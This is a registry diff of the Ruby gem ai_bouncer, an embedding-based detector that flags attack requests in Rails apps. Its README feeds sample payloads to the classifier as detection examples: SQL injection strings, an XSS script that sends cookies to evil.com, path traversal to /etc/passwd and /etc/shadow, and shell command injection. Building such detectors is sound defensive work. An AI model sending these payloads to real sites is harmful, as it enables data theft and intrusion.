ai_bouncer 0.9.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: c2a072917e797b85ac093208f69570b74484953862798ee4ff7225094014b2ed
4
+ data.tar.gz: 955abb9f068b1f9d987cb7c7a721c9e217f155d17122bfc71af08d12270e3114
5
+ SHA512:
6
+ metadata.gz: 672305a2780b60b00bb2fd894b01695a921f23386de7346ba12e6592efcf317d3c4052c6f3bd8d15c8933be1a4a3b69747822799330a27eb60f93535719d50f5
7
+ data.tar.gz: b2e0a367c5f93753bfc223189d33b9e9faa2e7a95be32408cb95ad9a30232331b7369030fc08040db920fe19c623a5e8c58e85eaed36f0acb993e83b2477df03
data/CHANGELOG.md ADDED
@@ -0,0 +1,55 @@
1
+ # Changelog
2
+
3
+ All notable changes to this project will be documented in this file.
4
+
5
+ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
6
+ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
7
+
8
+ ## [0.9.0] - 2025-01-17
9
+
10
+ ### Added
11
+
12
+ - **Core Classification Engine**
13
+ - Model2Vec-based text embeddings via ONNX Runtime
14
+ - KNN classifier with cosine similarity for attack detection
15
+ - Support for 8 attack types: SQLi, XSS, path traversal, command injection, credential stuffing, spam bots, scanners, and clean traffic
16
+
17
+ - **Rails Integration**
18
+ - Rack middleware for automatic request classification
19
+ - Controller concern with `protect_from_attacks` DSL
20
+ - Configurable actions: `:block`, `:log`, `:challenge`
21
+ - Callbacks for attack detection and monitoring
22
+
23
+ - **Storage Options**
24
+ - In-memory mode (default): ~2ms latency, ~30MB RAM
25
+ - Database mode: PostgreSQL + pgvector via neighbor gem
26
+
27
+ - **Auto-Download**
28
+ - Model files automatically downloaded from HuggingFace on first use
29
+ - Hosted at [huggingface.co/khasinski/ai-bouncer](https://huggingface.co/khasinski/ai-bouncer)
30
+
31
+ - **Generators**
32
+ - `rails generate ai_bouncer:install` - Creates initializer
33
+ - `rails generate ai_bouncer:migration` - Creates pgvector migration
34
+
35
+ - **Rake Tasks**
36
+ - `ai_bouncer:download` - Download model files
37
+ - `ai_bouncer:seed` - Seed database with attack patterns
38
+ - `ai_bouncer:stats` - Show pattern statistics
39
+ - `ai_bouncer:test` - Test classification
40
+ - `ai_bouncer:benchmark` - Benchmark performance
41
+
42
+ ### Model
43
+
44
+ - 3,053 attack pattern vectors
45
+ - Trained on SecLists, CSIC 2010, ModSecurity CRS, and real nginx logs
46
+ - 92%+ accuracy on test set
47
+
48
+ ## [Unreleased]
49
+
50
+ ### Planned
51
+
52
+ - Rate limiting integration
53
+ - IP reputation scoring
54
+ - Custom pattern training interface
55
+ - Prometheus metrics export
data/LICENSE.txt ADDED
@@ -0,0 +1,21 @@
1
+ The MIT License (MIT)
2
+
3
+ Copyright (c) 2025 Chris Hasinski
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in
13
+ all copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
21
+ THE SOFTWARE.
data/README.md ADDED
@@ -0,0 +1,449 @@
1
+ # AiBouncer
2
+
3
+ [![CI](https://github.com/khasinski/ai_bouncer/actions/workflows/ci.yml/badge.svg)](https://github.com/khasinski/ai_bouncer/actions/workflows/ci.yml)
4
+ [![Gem Version](https://badge.fury.io/rb/ai_bouncer.svg)](https://badge.fury.io/rb/ai_bouncer)
5
+
6
+ AI-powered HTTP request classification for Ruby on Rails. Detect credential stuffing, SQL injection, XSS, and other attacks using ML embeddings.
7
+
8
+ ## Features
9
+
10
+ - **Fast**: ~2ms inference time (memory mode)
11
+ - **Lightweight**: ~31MB total model size
12
+ - **Accurate**: 92%+ detection rate on common attacks
13
+ - **Flexible Storage**: In-memory or PostgreSQL + pgvector
14
+ - **Easy to integrate**: Drop-in middleware or controller concern
15
+ - **Configurable**: Protect specific paths, customize responses
16
+
17
+ ## Attack Types Detected
18
+
19
+ - SQL Injection (SQLi)
20
+ - Cross-Site Scripting (XSS)
21
+ - Path Traversal
22
+ - Command Injection
23
+ - Credential Stuffing
24
+ - Spam Bots
25
+ - Vulnerability Scanners
26
+
27
+ ## Requirements
28
+
29
+ - Ruby >= 3.2 (required by onnxruntime)
30
+ - Rails 6.1+ (optional, for middleware/concern integration)
31
+
32
+ ## Installation
33
+
34
+ Add to your Gemfile:
35
+
36
+ ```ruby
37
+ gem 'ai_bouncer'
38
+
39
+ # Optional: for database storage mode
40
+ gem 'neighbor'
41
+ ```
42
+
43
+ Then run the installer:
44
+
45
+ ```bash
46
+ bundle install
47
+ rails generate ai_bouncer:install
48
+ ```
49
+
50
+ This creates `config/initializers/ai_bouncer.rb`. Model files (~31MB) are **auto-downloaded** on first request.
51
+
52
+ ### Manual Download (Optional)
53
+
54
+ If you prefer to bundle model files with your app:
55
+
56
+ ```bash
57
+ # Download from HuggingFace
58
+ pip install huggingface_hub
59
+ huggingface-cli download khasinski/ai-bouncer --local-dir vendor/ai_bouncer
60
+
61
+ # Disable auto-download in initializer
62
+ config.auto_download = false
63
+ ```
64
+
65
+ ## Storage Modes
66
+
67
+ ### Memory Mode (Default)
68
+
69
+ Vectors are kept in memory. Fast and simple.
70
+
71
+ ```ruby
72
+ config.storage = :memory
73
+ ```
74
+
75
+ **Pros**: ~2ms latency, no database required
76
+ **Cons**: ~31MB RAM usage, patterns fixed at deploy time
77
+
78
+ ### Database Mode
79
+
80
+ Vectors are stored in PostgreSQL using pgvector.
81
+
82
+ ```ruby
83
+ config.storage = :database
84
+ ```
85
+
86
+ **Pros**: Scalable, add custom patterns at runtime, persistent
87
+ **Cons**: ~5ms latency, requires pgvector
88
+
89
+ #### Database Setup
90
+
91
+ 1. Install pgvector: https://github.com/pgvector/pgvector
92
+
93
+ 2. Generate and run migration:
94
+ ```bash
95
+ rails generate ai_bouncer:migration
96
+ rails db:migrate
97
+ ```
98
+
99
+ 3. Seed the bundled patterns:
100
+ ```bash
101
+ rails ai_bouncer:seed
102
+ ```
103
+
104
+ 4. Verify:
105
+ ```bash
106
+ rails ai_bouncer:stats
107
+ ```
108
+
109
+ ## Configuration
110
+
111
+ ```ruby
112
+ # config/initializers/ai_bouncer.rb
113
+
114
+ AiBouncer.configure do |config|
115
+ config.enabled = Rails.env.production?
116
+ config.storage = :memory # or :database
117
+
118
+ # Paths to protect (for middleware)
119
+ config.protected_paths = [
120
+ "/login",
121
+ "/register",
122
+ "/api/*",
123
+ ]
124
+
125
+ # Action when attack detected
126
+ config.action = :block # :block, :challenge, or :log
127
+ config.threshold = 0.3
128
+
129
+ # Model files location
130
+ config.model_path = Rails.root.join("vendor", "ai_bouncer")
131
+
132
+ # Callback for monitoring
133
+ config.on_attack_detected = ->(request:, classification:, action:) {
134
+ Rails.logger.warn "Attack: #{classification[:label]} from #{request.ip}"
135
+ }
136
+ end
137
+ ```
138
+
139
+ ## Usage
140
+
141
+ ### Option 1: Middleware (Automatic)
142
+
143
+ The middleware automatically protects configured paths. It extracts method, path, body, user-agent, and params from Rails requests - no manual formatting needed:
144
+
145
+ ```ruby
146
+ # A request like this:
147
+ # POST /login HTTP/1.1
148
+ # User-Agent: Mozilla/5.0...
149
+ # Content-Type: application/x-www-form-urlencoded
150
+ #
151
+ # username=admin'--&password=x
152
+
153
+ # Is automatically classified as:
154
+ # => { label: "sqli", confidence: 0.94, is_attack: true }
155
+ ```
156
+
157
+ ### Option 2: Controller Concern (Fine-grained)
158
+
159
+ For more control, use the controller concern:
160
+
161
+ ```ruby
162
+ class SessionsController < ApplicationController
163
+ include AiBouncer::ControllerConcern
164
+
165
+ # Protect all actions
166
+ protect_from_attacks
167
+
168
+ # Or protect specific actions with custom options
169
+ protect_from_attacks only: [:create],
170
+ threshold: 0.5,
171
+ action: :block
172
+ end
173
+ ```
174
+
175
+ Or check manually:
176
+
177
+ ```ruby
178
+ class PaymentsController < ApplicationController
179
+ include AiBouncer::ControllerConcern
180
+
181
+ def create
182
+ check_for_attack # Blocks if attack detected
183
+
184
+ # Normal flow continues...
185
+ end
186
+ end
187
+ ```
188
+
189
+ ### Option 3: Manual Classification
190
+
191
+ ```ruby
192
+ result = AiBouncer.classify(
193
+ AiBouncer.request_to_text(
194
+ method: "POST",
195
+ path: "/login",
196
+ body: "username=admin'--&password=x",
197
+ user_agent: "python-requests/2.28"
198
+ )
199
+ )
200
+
201
+ result
202
+ # => {
203
+ # label: "sqli",
204
+ # confidence: 0.94,
205
+ # is_attack: true,
206
+ # latency_ms: 2.1
207
+ # }
208
+ ```
209
+
210
+ ## Adding Custom Patterns (Database Mode)
211
+
212
+ ```ruby
213
+ # Add a pattern for a specific attack you've seen
214
+ embedding = AiBouncer.model.embed("POST /admin.php?cmd=wget...")
215
+
216
+ AiBouncer::AttackPattern.create!(
217
+ label: "scanner",
218
+ severity: "high",
219
+ embedding: embedding,
220
+ sample_text: "POST /admin.php?cmd=wget...",
221
+ source: "incident_2024_01"
222
+ )
223
+ ```
224
+
225
+ ## Rake Tasks
226
+
227
+ ```bash
228
+ # Download model files manually (auto-download is enabled by default)
229
+ rails ai_bouncer:download
230
+
231
+ # Seed bundled patterns into database (database mode only)
232
+ rails ai_bouncer:seed
233
+
234
+ # Show statistics
235
+ rails ai_bouncer:stats
236
+
237
+ # Test classification
238
+ rails ai_bouncer:test
239
+
240
+ # Benchmark performance
241
+ rails ai_bouncer:benchmark
242
+ ```
243
+
244
+ ## Real-World Examples
245
+
246
+ ### SQL Injection
247
+
248
+ ```ruby
249
+ # Authentication bypass
250
+ AiBouncer.classify("POST /login username=admin' OR '1'='1 password=x")
251
+ # => { label: "sqli", confidence: 0.94, is_attack: true }
252
+
253
+ # UNION-based data extraction
254
+ AiBouncer.classify("GET /users?id=1 UNION SELECT username,password FROM users--")
255
+ # => { label: "sqli", confidence: 0.96, is_attack: true }
256
+
257
+ # Blind SQL injection
258
+ AiBouncer.classify("GET /products?id=1 AND SLEEP(5)")
259
+ # => { label: "sqli", confidence: 0.91, is_attack: true }
260
+ ```
261
+
262
+ ### Cross-Site Scripting (XSS)
263
+
264
+ ```ruby
265
+ # Script injection in comments
266
+ AiBouncer.classify("POST /comments body=<script>document.location='http://evil.com/steal?c='+document.cookie</script>")
267
+ # => { label: "xss", confidence: 0.96, is_attack: true }
268
+
269
+ # Event handler injection
270
+ AiBouncer.classify("POST /profile bio=<img src=x onerror=alert('XSS')>")
271
+ # => { label: "xss", confidence: 0.93, is_attack: true }
272
+
273
+ # SVG-based XSS
274
+ AiBouncer.classify("POST /upload filename=<svg onload=alert(1)>.svg")
275
+ # => { label: "xss", confidence: 0.89, is_attack: true }
276
+ ```
277
+
278
+ ### Credential Stuffing
279
+
280
+ ```ruby
281
+ # Automated login attempts with browser-like UA (common in credential stuffing botnets)
282
+ AiBouncer.classify("POST /wp-login.php UA:Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120")
283
+ # => { label: "credential_stuffing", confidence: 0.94, is_attack: true }
284
+
285
+ # High-frequency login pattern
286
+ AiBouncer.classify("POST /wp-login.php UA:Mozilla/5.0 (X11; Ubuntu; Linux x86_64) Chrome/119")
287
+ # => { label: "credential_stuffing", confidence: 0.92, is_attack: true }
288
+ ```
289
+
290
+ ### Spam Bots
291
+
292
+ ```ruby
293
+ # Comment spam with referrer pattern
294
+ AiBouncer.classify("POST /wp-comments-post.php REF:https://example.com/blog/article UA:Mozilla/5.0 (Windows NT 6.3) Chrome/103")
295
+ # => { label: "spam_bot", confidence: 0.91, is_attack: true }
296
+
297
+ # Old browser version (common in botnets)
298
+ AiBouncer.classify("POST /contact UA:Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/56.0.2924.87")
299
+ # => { label: "spam_bot", confidence: 0.87, is_attack: true }
300
+ ```
301
+
302
+ ### Vulnerability Scanners
303
+
304
+ ```ruby
305
+ # WordPress plugin scanning with bot UA
306
+ AiBouncer.classify("GET /wp-content/plugins/register-plus-redux UA:Mozilla/5.0 Chrome/126")
307
+ # => { label: "scanner", confidence: 0.89, is_attack: true }
308
+
309
+ # Registration page probing with bot UA
310
+ AiBouncer.classify("GET /wp-login.php?action=register UA:Go-http-client/2.0")
311
+ # => { label: "scanner", confidence: 0.85, is_attack: true }
312
+ ```
313
+
314
+ > **Note**: Scanner detection works best when combined with user-agent analysis. Pure path scanning without suspicious UA may be classified as other attack types.
315
+
316
+ ### Path Traversal
317
+
318
+ ```ruby
319
+ # Directory traversal to read system files
320
+ AiBouncer.classify("GET /files?path=../../../etc/passwd")
321
+ # => { label: "path_traversal", confidence: 0.89, is_attack: true }
322
+
323
+ # Encoded traversal
324
+ AiBouncer.classify("GET /download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow")
325
+ # => { label: "path_traversal", confidence: 0.87, is_attack: true }
326
+
327
+ # Windows path traversal
328
+ AiBouncer.classify("GET /files?name=....\\....\\....\\windows\\system32\\config\\sam")
329
+ # => { label: "path_traversal", confidence: 0.86, is_attack: true }
330
+ ```
331
+
332
+ ### Command Injection
333
+
334
+ ```ruby
335
+ # Shell command in parameter
336
+ AiBouncer.classify("GET /ping?host=127.0.0.1;cat /etc/passwd")
337
+ # => { label: "command_injection", confidence: 0.93, is_attack: true }
338
+
339
+ # Backtick injection
340
+ AiBouncer.classify("POST /convert filename=`whoami`.pdf")
341
+ # => { label: "command_injection", confidence: 0.90, is_attack: true }
342
+
343
+ # Pipeline injection
344
+ AiBouncer.classify("GET /search?q=test|ls -la")
345
+ # => { label: "command_injection", confidence: 0.88, is_attack: true }
346
+ ```
347
+
348
+ ### Clean Requests (No False Positives)
349
+
350
+ ```ruby
351
+ # Normal login
352
+ AiBouncer.classify("POST /login username=john.doe@example.com password=secretpass123")
353
+ # => { label: "clean", confidence: 0.92, is_attack: false }
354
+
355
+ # Normal API request
356
+ AiBouncer.classify("GET /api/users/123")
357
+ # => { label: "clean", confidence: 0.91, is_attack: false }
358
+
359
+ # Paginated API request
360
+ AiBouncer.classify("GET /api/products?page=1&limit=20")
361
+ # => { label: "clean", confidence: 0.99, is_attack: false }
362
+
363
+ # Normal form submission
364
+ AiBouncer.classify("POST /contact name=John Smith&email=john@example.com&message=Hello")
365
+ # => { label: "clean", confidence: 0.95, is_attack: false }
366
+ ```
367
+
368
+ ## Classification Result
369
+
370
+ ```ruby
371
+ {
372
+ label: "sqli", # Attack type or "clean"
373
+ confidence: 0.94, # 0.0 - 1.0
374
+ is_attack: true, # Boolean
375
+ latency_ms: 2.1, # Inference time
376
+ storage: :memory, # or :database
377
+ nearest_distance: 0.06, # Distance to nearest pattern
378
+ neighbors: [ # K nearest neighbors
379
+ { label: "sqli", distance: 0.06 },
380
+ { label: "sqli", distance: 0.08 },
381
+ ...
382
+ ]
383
+ }
384
+ ```
385
+
386
+ ## Performance
387
+
388
+ Benchmarks on Apple Silicon:
389
+
390
+ | Mode | Mean | P50 | P99 |
391
+ |------|------|-----|-----|
392
+ | Memory | 2ms | 2ms | 3ms |
393
+ | Database | 5ms | 4ms | 8ms |
394
+
395
+ ## Model Files
396
+
397
+ Model is hosted on HuggingFace: [khasinski/ai-bouncer](https://huggingface.co/khasinski/ai-bouncer)
398
+
399
+ Auto-downloaded to `vendor/ai_bouncer/` on first request:
400
+
401
+ | File | Size | Description |
402
+ |------|------|-------------|
403
+ | `embedding_model.onnx` | 29 MB | Model2Vec ONNX model |
404
+ | `vocab.json` | 550 KB | Tokenizer vocabulary |
405
+ | `vectors.bin` | 1.1 MB | Attack pattern vectors (memory mode) |
406
+ | `labels.json` | 28 KB | Labels and metadata |
407
+
408
+ ## How It Works
409
+
410
+ 1. **Tokenize**: Request → Unigram tokens
411
+ 2. **Embed**: Tokens → 256-dim vector (Model2Vec via ONNX)
412
+ 3. **Search**: Find k=5 nearest attack patterns
413
+ 4. **Vote**: Weighted voting on attack type
414
+ 5. **Decide**: Block if confidence > threshold
415
+
416
+ ## Contributing Training Data
417
+
418
+ **Help make AiBouncer better!** The model currently uses a small dataset (~1,000 patterns) derived from:
419
+ - Public security payloads (SecLists, fuzzdb)
420
+ - CSIC 2010 HTTP dataset
421
+ - A sample of real nginx logs
422
+
423
+ I'd love to gather more **real-world traffic data** to improve detection accuracy. If you have access to:
424
+
425
+ - **Attack logs** - Blocked requests from your WAF, failed login attempts, spam submissions
426
+ - **Clean traffic** - Normal API requests, legitimate form submissions
427
+ - **False positives** - Requests that were incorrectly flagged as attacks
428
+
429
+ Please consider contributing! You can:
430
+
431
+ 1. **Share anonymized logs** - Remove sensitive data (IPs, emails, passwords) and open an issue
432
+ 2. **Report misclassifications** - Let me know what the model gets wrong
433
+ 3. **Add labeled samples** - PRs with new attack patterns are welcome
434
+
435
+ The more diverse real-world data we have, the better the model becomes for everyone.
436
+
437
+ Contact: Open an issue at [github.com/khasinski/ai_bouncer](https://github.com/khasinski/ai_bouncer/issues)
438
+
439
+ ## License
440
+
441
+ MIT License.
442
+
443
+ ## Contributing Code
444
+
445
+ 1. Fork it
446
+ 2. Create your feature branch
447
+ 3. Commit your changes
448
+ 4. Push to the branch
449
+ 5. Create a Pull Request
@@ -0,0 +1,155 @@
1
+ # frozen_string_literal: true
2
+
3
+ module AiBouncer
4
+ # ActiveRecord model for storing attack pattern vectors
5
+ # Uses pgvector via the neighbor gem for fast similarity search
6
+ #
7
+ # Usage:
8
+ # # Find similar patterns
9
+ # embedding = AiBouncer.model.embed("POST /login username=admin' OR '1'='1")
10
+ # patterns = AiBouncer::AttackPattern.nearest_neighbors(:embedding, embedding, distance: "cosine").limit(5)
11
+ #
12
+ # # Classify request
13
+ # result = AiBouncer::AttackPattern.classify(embedding, k: 5)
14
+ #
15
+ class AttackPattern < ActiveRecord::Base
16
+ self.table_name = "attack_patterns"
17
+
18
+ # Include neighbor for vector similarity search
19
+ # Requires: gem "neighbor" in Gemfile
20
+ if defined?(Neighbor)
21
+ has_neighbors :embedding
22
+ end
23
+
24
+ ATTACK_LABELS = %w[sqli xss path_traversal command_injection credential_stuffing spam_bot scanner].freeze
25
+ SEVERITIES = %w[low medium high critical].freeze
26
+
27
+ validates :label, presence: true, inclusion: { in: ATTACK_LABELS + ["clean"] }
28
+ validates :severity, inclusion: { in: SEVERITIES }, allow_nil: true
29
+ validates :embedding, presence: true
30
+
31
+ scope :attacks_only, -> { where.not(label: "clean") }
32
+ scope :by_label, ->(label) { where(label: label) }
33
+ scope :by_severity, ->(severity) { where(severity: severity) }
34
+
35
+ # Classify an embedding using KNN voting
36
+ # Returns hash with label, confidence, neighbors, etc.
37
+ def self.classify(embedding, k: 5)
38
+ unless defined?(Neighbor)
39
+ raise AiBouncer::Error, "neighbor gem required for database classification. Add 'gem \"neighbor\"' to your Gemfile."
40
+ end
41
+
42
+ start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
43
+
44
+ # Find k nearest neighbors using cosine distance
45
+ neighbors = nearest_neighbors(:embedding, embedding, distance: "cosine")
46
+ .limit(k)
47
+ .select(:id, :label, :severity, :sample_text)
48
+
49
+ # Get distances (neighbor gem returns them via neighbor_distance)
50
+ neighbor_data = neighbors.map do |n|
51
+ {
52
+ id: n.id,
53
+ label: n.label,
54
+ severity: n.severity,
55
+ distance: n.neighbor_distance,
56
+ similarity: 1.0 - n.neighbor_distance
57
+ }
58
+ end
59
+
60
+ result = compute_result(neighbor_data)
61
+
62
+ end_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
63
+ result[:latency_ms] = ((end_time - start_time) * 1000).round(2)
64
+ result[:storage] = :database
65
+
66
+ result
67
+ end
68
+
69
+ # Batch import embeddings from bundled data
70
+ def self.seed_from_bundled_data!(model_path: nil)
71
+ model_path ||= AiBouncer.configuration.model_path
72
+ raise AiBouncer::ConfigurationError, "model_path not configured" unless model_path
73
+
74
+ vectors_path = File.join(model_path, "vectors.bin")
75
+ labels_path = File.join(model_path, "labels.json")
76
+
77
+ unless File.exist?(vectors_path) && File.exist?(labels_path)
78
+ raise AiBouncer::ModelNotFoundError, "Bundled data not found at #{model_path}"
79
+ end
80
+
81
+ # Load labels metadata
82
+ labels_data = JSON.parse(File.read(labels_path))
83
+ labels = labels_data["labels"]
84
+ severities = labels_data["severities"]
85
+ num_vectors = labels_data["num_vectors"]
86
+ dim = labels_data["dim"]
87
+
88
+ # Load vectors (binary float32)
89
+ data = File.binread(vectors_path)
90
+ floats = data.unpack("e*") # little-endian float32
91
+
92
+ vectors = []
93
+ floats.each_slice(dim) { |row| vectors << row }
94
+
95
+ # Clear existing data
96
+ delete_all
97
+
98
+ # Batch insert
99
+ records = vectors.each_with_index.map do |vec, i|
100
+ {
101
+ label: labels[i],
102
+ severity: severities[i],
103
+ embedding: vec,
104
+ source: "bundled",
105
+ created_at: Time.current,
106
+ updated_at: Time.current
107
+ }
108
+ end
109
+
110
+ # Insert in batches of 500
111
+ records.each_slice(500) do |batch|
112
+ insert_all(batch)
113
+ end
114
+
115
+ count
116
+ end
117
+
118
+ private
119
+
120
+ def self.compute_result(neighbors)
121
+ return { label: "clean", confidence: 0.0, is_attack: false } if neighbors.empty?
122
+
123
+ # Vote on label with distance weighting
124
+ votes = Hash.new(0.0)
125
+
126
+ neighbors.each do |n|
127
+ weight = n[:similarity]
128
+ votes[n[:label]] += weight
129
+ end
130
+
131
+ # Get winner
132
+ predicted_label = votes.max_by { |_, v| v }&.first || "clean"
133
+
134
+ # Compute confidence
135
+ nearest_distance = neighbors.first[:distance]
136
+ confidence = 1.0 - nearest_distance
137
+
138
+ # Adjust by voting margin
139
+ total_weight = votes.values.sum
140
+ winner_weight = votes[predicted_label]
141
+ voting_confidence = total_weight > 0 ? winner_weight / total_weight : 0
142
+
143
+ final_confidence = (confidence + voting_confidence) / 2
144
+
145
+ {
146
+ label: predicted_label,
147
+ confidence: final_confidence.round(4),
148
+ is_attack: predicted_label != "clean",
149
+ nearest_distance: nearest_distance.round(4),
150
+ neighbors: neighbors.map { |n| { label: n[:label], distance: n[:distance].round(4) } },
151
+ votes: votes.transform_values { |v| v.round(4) }
152
+ }
153
+ end
154
+ end
155
+ end